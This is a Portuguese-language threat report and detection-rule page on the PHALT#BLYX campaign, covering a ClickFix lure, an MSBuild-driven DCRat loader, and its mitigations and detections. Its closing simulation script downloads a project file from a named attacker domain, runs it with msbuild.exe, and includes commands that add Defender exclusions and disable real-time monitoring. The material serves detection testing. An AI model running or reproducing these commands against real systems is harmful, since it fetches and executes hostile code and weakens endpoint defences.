Análise do PHALT#BLYX: BSODs Falsos e Ferramentas de Construção Confiáveis em Cadeias de Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório detalha uma cadeia de intrusão em várias etapas que afeta o setor de hospitalidade, combinando uma página falsa de Booking.com, uma animação enganosa estilo tela azul e um prompt estilo ClickFix para persuadir os usuários a executar um PowerShell dropper. Esse dropper obtém um arquivo de projeto MSBuild, que executa um carregador DCRat personalizado. O carregador altera o Windows Defender, define persistência usando um atalho .url de Inicialização e injeta sua carga útil em processos legítimos. Ao se apoiar em utilitários living-off-the-land como PowerShell e MSBuild.exe, os operadores reduzem traços de malware óbvios. Artefatos em russo na cadeia também são notados como uma pista de atribuição.
Investigação
Os pesquisadores da Securonix mapearam o fluxo de e-mails de phishing oferecendo links de “cancelamento de reserva” a um domínio malicioso, então a uma linha única de PowerShell que localiza msbuild.exe, baixa um arquivo v.proj e o executa. O projeto v.proj realiza várias ações: adiciona exclusões no Windows Defender, baixa staxs.exe (uma variante do DCRat), cria um atalho .url de Inicialização para persistência, e conecta-se à infraestrutura de comando e controle pela porta 3535. O carregador então comprime e injeta a etapa final em aspnet_compiler.exe, usando hollowing de processo para se misturar à atividade legítima.
Mitigação
Reduza a exposição treinando os usuários para reconhecer prompts no estilo ClickFix e engenharia social de “execute este comando para corrigir”. Monitore e restrinja a execução de MSBuild.exe – especialmente quando invocado de locais incomuns ou fluxos de trabalho orientados pelo usuário – e habilite o registro de blocos de script do PowerShell para melhor visibilidade. Adicione detecções para a criação de atalhos na pasta de Inicialização e para modificações nas exclusões do Windows Defender. Na camada de rede, bloqueie o tráfego de saída para os domínios maliciosos identificados e restrinja explicitamente ou alerte sobre egressos suspeitos para o TCP/3535 onde não for necessário.
Resposta
Se a atividade for detectada, isole o host e preserve os principais artefatos, incluindo v.proj, staxs.exe, e quaisquer arquivos de Inicialização .url. Remova exclusões não autorizadas do Defender, encerre processos maliciosos ou injetados, e bloqueie domínios/IPs C2 associados – especialmente quaisquer comunicações pela porta 3535. Redefina credenciais potencialmente expostas, execute uma verificação completa de malware e analise o ambiente para padrões de execução semelhantes dirigidos por MSBuild e comandos PowerShell. Finalmente, implemente detecções informadas por inteligência de ameaças que se concentrem em abuso de MSBuild, comportamento ClickFix, e persistência via atalhos de Inicialização para evitar a recorrência.
Fluxo do Ataque
Detecções
Download ou Upload via Powershell (via cmdline)
Ver
Alterações Suspeitas nas Preferências do Windows Defender (via powershell)
Ver
Possíveis Pontos de Persistência [ASEPs – Software/NTUSER Hive] (via registry_event)
Ver
Binários / Scripts Suspeitos em Local de Inicialização (via file_event)
Ver
IOCs (HashSha512) para detectar: Analisando PHALT#BLYX: Como BSODs Falsos e Ferramentas de Build Confiáveis São Usadas para Construir uma Infecção por Malware
Ver
IOCs (SourceIP) para detectar: Analisando PHALT#BLYX: Como BSODs Falsos e Ferramentas de Build Confiáveis São Usadas para Construir uma Infecção por Malware
Ver
IOCs (HashSha256) para detectar: Analisando PHALT#BLYX: Como BSODs Falsos e Ferramentas de Build Confiáveis São Usadas para Construir uma Infecção por Malware
Ver
IOCs (DestinationIP) para detectar: Analisando PHALT#BLYX: Como BSODs Falsos e Ferramentas de Build Confiáveis São Usadas para Construir uma Infecção por Malware
Ver
PHALT#BLYX Execução Maliciosa de Carga Útil via MSBuild e Hollowing de Processo [Criação de Processo do Windows]
Ver
PHALT#BLYX Campanha de Malware Usando PowerShell e MSBuild para Infecção [Windows Powershell]
Ver
Execução da Simulação
Pré-requisito: O Check de Pré-Voo de Telemetria e Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa refletem diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção.
-
Narrativa e Comandos do Ataque:
O ator da ameaça abre uma sessão do PowerShell em um endpoint comprometido. Eles localizam primeiro omsbuild.exebinário, então baixam um projeto MSBuild malicioso (v.proj) paraC:ProgramData. O atacante imediatamente invocamsbuild.exepara executar a carga útil, que derruba um segundo estágio. Finalmente, eles alteram o Windows Defender adicionando exclusões e desativando o monitoramento em tempo real para garantir persistência. -
Script de Teste de Regressão:
# Script de simulação PHALT#BLYX – reproduz atividade de acionamento de detecção # -------------------------------------------------------------- # 1. Localize o msbuild.exe $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName # 2. Baixe o projeto MSBuild malicioso para ProgramData $projUrl = "https://2fa-bns.com/v.proj" $dest = "$env:ProgramDatav.proj" Invoke-WebRequest -Uri $projUrl -OutFile $dest # 3. Execute o projeto com msbuild.exe & $msb $dest # 4. Modifique as configurações do Windows Defender (qualquer uma das seguintes satisfará a regra) # Descomente as linhas desejadas para simular as ações do atacante. # Adicionar caminho de exclusão # Add-MpPreference -ExclusionPath "$env:ProgramData" # Adicionar exclusão para arquivos .exe # Add-MpPreference -ExclusionExtension ".exe" # Adicionar exclusão para arquivos .ps1 # Add-MpPreference -ExclusionExtension ".ps1" # Desabilitar monitoramento em tempo real # Set-MpPreference -DisableRealtimeMonitoring $true -
Comandos de Limpeza:
# Remover o arquivo de projeto baixado Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue # Restaurar monitoramento em tempo real do Windows Defender (se foi desativado) Set-MpPreference -DisableRealtimeMonitoring $false # Remover quaisquer exclusões adicionadas (exemplo para exclusão de caminho) Remove-MpPreference -ExclusionPath "$env:ProgramData" # Opcionalmente excluir quaisquer arquivos restantes criados pela carga útil # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue